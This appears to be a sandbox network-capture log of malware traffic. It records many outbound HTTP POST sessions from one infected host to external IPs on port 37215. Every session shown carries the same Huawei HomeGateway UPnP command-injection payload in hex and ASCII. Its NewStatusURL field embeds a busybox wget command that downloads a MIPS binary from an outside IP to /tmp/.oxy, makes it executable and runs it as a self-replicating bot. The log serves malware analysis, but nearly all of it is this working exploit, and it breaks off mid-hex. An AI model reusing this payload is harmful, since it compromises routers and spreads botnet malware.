                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1824192.168.2.1347696219.186.151.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639640093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1825192.168.2.1360792198.140.33.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639698982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1826192.168.2.1332828157.175.31.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639729023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1827192.168.2.1356180157.187.15.15837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639729023 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1828192.168.2.1356412122.226.235.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639761925 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1829192.168.2.1333896197.107.96.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639790058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1830192.168.2.1340010157.63.106.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639822006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1831192.168.2.1354248157.183.210.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639838934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1832192.168.2.133942698.43.230.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.639882088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1833192.168.2.1334384157.109.170.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.640347958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 